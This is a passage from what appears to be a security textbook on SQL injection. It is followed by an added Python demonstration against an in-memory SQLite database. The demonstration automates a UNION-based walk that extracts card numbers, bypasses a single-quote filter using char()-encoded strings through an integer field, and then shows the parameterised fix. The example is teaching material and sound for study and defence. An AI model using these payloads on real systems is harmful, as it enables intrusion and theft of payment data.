
returns:
1234666633337890
storyid=0 union select card_no from card_auths where card_no>1234666633337890
returns:
1234678911114567
There are more techniques available for SQL injection, but they go beyond
the scope of this book. Newer techniques include:
■ Evading single quote filters This is when the programmer knows to
remove or replace single quotes in user input. It was formerly thought that
this step removed the possibility of SQL injection against string values,
just as typing the input as an integer prevents it against integer values.
There is a technique using a SQL function (such as char(), which builds a
string from numeric character codes) that still lets an attacker place
string values in the query, and therefore insert them into the database,
without a single quote character appearing in the input.
■ Blind SQL injection This is an ...
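As an added, runnable illustration of both the ordered card_no walk shown earlier (storyid=0 union select ... where card_no>last) and the single-quote filter evasion item above, here is example code written for this edit, not taken from the book. It builds an in-memory SQLite database; the only names taken from the text are storyid, card_auths and card_no, while the stories and comments tables, the story page that renders just its first row, and the comment handler that strips single quotes are assumptions. The walk reuses the book's payload shape unchanged; for the unnamed "SQL function" the bypass uses char(), which is one common choice, and the hardened handler at the end shows the typed, parameterised form that stops both attacks.

```python
import sqlite3

# Constructed sample data for this example (not from the book); the book's two
# values are included so the walk reproduces its sequence.
CARD_NUMBERS = [1234666633337890, 1234678911114567, 1234567890123456]


def build_db():
    """In-memory stand-in for the book's database. Only storyid, card_auths and
    card_no come from the text; the stories and comments tables are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE stories (storyid INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO stories VALUES (1, 'First story');
        CREATE TABLE card_auths (card_no INTEGER PRIMARY KEY);
        CREATE TABLE comments (storyid INTEGER, body TEXT);
    """)
    conn.executemany("INSERT INTO card_auths VALUES (?)", [(n,) for n in CARD_NUMBERS])
    conn.commit()
    return conn


def vulnerable_story_page(conn, storyid_param):
    """Hypothetical story page: concatenates the storyid parameter into its query
    (the injection bug) and renders only the first row that comes back."""
    row = conn.execute("SELECT title FROM stories WHERE storyid=" + storyid_param).fetchone()
    return None if row is None else row[0]


def walk_card_numbers(conn):
    """The book's walk: storyid=0 matches no story, so the single row shown is the
    lowest card_no above the last one seen. Repeat until nothing comes back."""
    found, last = [], 0
    while True:
        payload = f"0 union select card_no from card_auths where card_no>{last}"
        card = vulnerable_story_page(conn, payload)
        if card is None:
            return found
        last = int(card)
        found.append(last)


def strip_quotes(value):
    """The filter the 'evading single quote filters' item describes."""
    return value.replace("'", "")


def vulnerable_add_comment(conn, storyid_param, body_param):
    """Hypothetical comment handler: strips quotes from both inputs, wraps the
    body in quotes, pastes storyid unquoted because it is 'known' to be an
    integer, and still builds the statement by concatenation."""
    sql = ("INSERT INTO comments (storyid, body) VALUES ("
           + strip_quotes(storyid_param) + ", '" + strip_quotes(body_param) + "')")
    conn.execute(sql)
    conn.commit()


def sql_char_literal(text):
    """Spell a string as char(code, code, ...) so the payload contains no quote
    character at all. char() with a code list exists in SQLite and MySQL;
    Transact-SQL needs a CHAR(n)+CHAR(n) chain instead."""
    return "char(" + ",".join(str(ord(c)) for c in text) + ")"


def inject_comment_without_quotes(conn, text):
    """Through the integer parameter, close the handler's VALUES row early with
    our own char() string and let the handler's quoted body become a second
    row. The stored text can even contain the single quote the filter removes."""
    payload = f"1, {sql_char_literal(text)}), (2"
    vulnerable_add_comment(conn, payload, "ignored")
    return [body for (body,) in conn.execute("SELECT body FROM comments ORDER BY storyid")]


def safe_add_comment(conn, storyid_param, body_param):
    """Hardened form: type the integer parameter and bind both values, so the
    payload above fails at int() instead of reaching the database."""
    conn.execute("INSERT INTO comments (storyid, body) VALUES (?, ?)",
                 (int(storyid_param), body_param))
    conn.commit()


if __name__ == "__main__":
    db = build_db()
    print("walk:", walk_card_numbers(db))
    print("rows:", inject_comment_without_quotes(db, "it's in"))
```

The walk relies on the page showing the smallest matching row first; against a database that returns rows in some other order, the same payload wants an ORDER BY card_no appended. The quote bypass works because the quote filter only ever looks at the string field while the injection rides in through the field the programmer treats as an integer; the parameterised handler closes both holes because the integer is converted before it reaches SQL and the body is never spliced into the statement text.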